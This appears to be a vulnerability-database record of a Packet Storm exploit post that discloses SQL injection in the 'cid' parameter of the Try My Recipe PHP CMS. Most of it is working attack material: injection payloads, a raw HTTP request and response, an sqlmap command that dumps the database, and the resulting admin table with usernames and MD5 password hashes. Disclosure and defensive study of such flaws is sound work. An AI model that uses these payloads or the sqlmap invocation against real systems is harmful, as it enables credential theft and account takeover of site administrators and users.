{"id": "PACKETSTORM:164397", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Try My Recipe SQL Injection", "description": "", "published": "2021-10-05T00:00:00", "modified": "2021-10-05T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/164397/Try-My-Recipe-SQL-Injection.html", "reporter": "nu11secur1ty", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-05T15:04:09", "viewCount": 90, "enchantments": {"dependencies": {}, "score": {"value": 0.3, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/164397/trymyrecipe-sql.txt", "sourceData": "`https://www.sourcecodester.com/php/14964/try-my-recipe-recipe-sharing-website-cms-php-and-sqlite-free-source-code.html \n \n## [CVE-nu11-17-092921](https://www.sourcecodester.com/php/14964/try-my-recipe-recipe-sharing-website-cms-php-and-sqlite-free-source-code.html) \n## [Vendor](https://www.sourcecodester.com/users/tips23) \n \n \n## MySQL Vulnerability Description: \nThe `cid` parameter of Recipe Sharing Website - CMS \n(by oretnom23) appears to be vulnerable to SQL injection attacks. The payloads \n12345678' or '7775'='7775 and 77335599' or '5533'='5577 were each \nsubmitted in the `cid` parameter. These two requests resulted in \ndifferent responses, indicating that the input is being incorporated \ninto a SQL query in an unsafe way. \nThe attacker can dump information about users and their passwords, \nand can then take control of their accounts. 
\n \n- MySQL Request: \n \n```cmd \nGET /recipe_site/?page=recipe&cid=12345678'%20or%20'7775'%3d'7775 HTTP/1.1 \nHost: 192.168.1.180 \nCookie: PHPSESSID=v4f40h5nvo41f7t5j0jg8f7pvd \nUpgrade-Insecure-Requests: 1 \nReferer: http://192.168.1.180/recipe_site/ \nAccept-Encoding: gzip, deflate \nAccept: */* \nAccept-Language: en-US,en-GB;q=0.9,en;q=0.8 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) \nAppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 \nSafari/537.36 \nConnection: close \nCache-Control: max-age=0 \n``` \n \n- MySQL Response: \n \n```cmd \nHTTP/1.1 200 OK \nDate: Wed, 29 Sep 2021 07:50:44 GMT \nServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22 \nX-Powered-By: PHP/7.4.22 \nExpires: Thu, 19 Nov 1981 08:52:00 GMT \nCache-Control: no-store, no-cache, must-revalidate \nPragma: no-cache \nConnection: close \nContent-Type: text/html; charset=UTF-8 \nContent-Length: 13306 \n \n<br /> \n<b>Warning</b>: SQLite3::exec(): database is locked in \n<b>C:\\xampp\\htdocs\\recipe_site\\DBConnection.php</b> on line \n<b>76</b><br /> \n<br /> \n<b>Warning</b>: SQLite3::exec(): database is locked i \n...[SNIP]... \n<div class=\"item col wow bounceInUp\"> \n...[SNIP]... \n<div class=\"card shadow-sm \"> \n...[SNIP]... \n<div class=\"card-body \"> \n...[SNIP]... \n<h5 class=\"card-title mb-1\">Sample Recipe 102</h5> \n...[SNIP]... \n<hr class=\"bg-primary opacity-100\"> \n...[SNIP]... \n<p class=\"truncate-3 fw-light fst-italic lh-1\" title=\"Class aptent \ntaciti sociosqu ad litora torquent per conubia nostra, per inceptos \nhimenaeos. Etiam hendrerit tellus in nisi semper vulputate. Curabitur \naccumsan metus sit amet erat volutpat, pl \n...[SNIP]... \n<div class=\"w-100 d-flex justify-content-end\"> \n...[SNIP]... \n<div class=\"col-auto flex-grow-1\"> \n...[SNIP]... \n<div class=\"text-muted truncate-1\" title=\"Claire Blake\"> \n...[SNIP]... \n<div class=\"col-auto\"> \n...[SNIP]... 
\n<a href=\"./?page=view_recipe&rid=2\" class=\"btn btn-sm btn-primary \nbg-gradient rounded-0 py-0\">View Recipes</a> \n...[SNIP]... \n<div class=\"item col wow bounceInUp\"> \n...[SNIP]... \n<div class=\"card shadow-sm \"> \n...[SNIP]... \n<div class=\"card-body \"> \n...[SNIP]... \n<h5 class=\"card-title mb-1\">Sample Menu</h5> \n...[SNIP]... \n<hr class=\"bg-primary opacity-100\"> \n...[SNIP]... \n<p class=\"truncate-3 fw-light fst-italic lh-1\" title=\"Lorem ipsum \ndolor sit amet, consectetur adipiscing elit. Ut vestibulum, magna sed \nporttitor venenatis, metus ex ornare arcu, non tincidunt orci lectus \nat odio. Proin elementum convallis leo at \n...[SNIP]... \n<div class=\"w-100 d-flex justify-content-end\"> \n...[SNIP]... \n<div class=\"col-auto flex-grow-1\"> \n...[SNIP]... \n<div class=\"text-muted truncate-1\" title=\"Try My Recipe Mgt\"> \n...[SNIP]... \n<div class=\"col-auto\"> \n...[SNIP]... \n<a href=\"./?page=view_recipe&rid=1\" class=\"btn btn-sm btn-primary \nbg-gradient rounded-0 py-0\">View Recipes</a> \n...[SNIP]... 
\n``` \n \n- The PoC: \n \n```cmd \npython sqlmap.py -u \n\"http://192.168.1.180/recipe_site/?page=view_recipe&rid=2\" \n--data=\"username=PWNED&password=password\" \n--cookie=\"PHPSESSID=v4f40h5nvo41f7t5j0jg8f7pvd\" --batch \n--answers=\"crack=N,dict=N,continue=Y,quit=N\" --dump \n``` \n- Output from the PoC: \n \n- dump \n \nTable: admin_list \n[2 entries] \n+----------+------+--------+---------------+----------------------------------+-----------+---------------------+ \n| admin_id | type | status | fullname | password \n| username | date_created | \n+----------+------+--------+---------------+----------------------------------+-----------+---------------------+ \n| 1 | 1 | 1 | Administrator | \n0192023a7bbd73250516f069df18b500 | admin | 2021-09-28 01:54:24 | \n| 2 | 2 | 1 | Mike Williams | \na88df23ac492e6e2782df6586a0c645f | mwilliams | 2021-09-28 08:00:51 | \n+----------+------+--------+---------------+----------------------------------+-----------+---------------------+ \n \n# BR \n \n \nSystem Administrator - Infrastructure Engineer \nPenetration Testing Engineer \nExploit developer at https://www.exploit-db.com/ \nhttps://www.nu11secur1ty.com/ \nhiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= \nnu11secur1ty <http://nu11secur1ty.com/> \n`\n", "_state": {"dependencies": 1646047292}}